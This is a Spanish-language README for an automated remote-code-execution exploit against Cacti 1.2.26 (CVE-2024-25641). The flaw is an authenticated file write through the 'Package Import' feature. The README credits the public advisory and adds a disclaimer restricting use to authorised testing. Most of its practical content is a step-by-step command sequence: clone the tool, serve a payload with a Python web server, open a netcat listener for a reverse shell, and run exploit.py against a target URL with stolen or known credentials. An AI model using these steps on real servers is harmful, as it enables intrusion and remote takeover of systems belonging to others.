
CVE-2024-25641 - Exploit automatizado de RCE - Cacti 1.2.26
Exploit totalmente automatizado para CVE-2024-25641. Cuando un usuario está autenticado, Cacti versión 1.2.26 es vulnerable a una vulnerabilidad de escritura arbitraria de archivos, explotable a través de la función "Package Import", permite a usuarios autenticados que tengan el permiso "Import Templates" ejecutar código PHP arbitrario en el servidor web (RCE).
Créditos para este PoC : https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88 (Simplemente he automatizado esto para obtener una posición inicial.)
Esta herramienta está destinada únicamente a fines educativos y de prueba. El autor de esta herramienta no es responsable de ningún uso indebido o actividades ilegales realizadas con ella. Utilice esta herramienta solo en sistemas de su propiedad o para los que tenga permiso explícito para probar. El acceso no autorizado a sistemas informáticos es ilegal y poco ético.
# Clone the repository
git clone https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26.git
cd CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26
# Setup Python web server
python -m http.server <PYTHON_WEB_SERVER_PORT>
# Setup netcat listener
nc -lvnp <LOCAL_PORT>
# Run the tool
pip install -r requirements.txt (if needed)
python exploit.py -L <LOCAL_IP> -lp <LOCAL_PORT> -wp <PYTHON_WEB_SERVER_PORT> -url <URL> -u <USER> -p <PASS>
También puedes echarle un vistazo a esto : CVE-2024-25641 PoC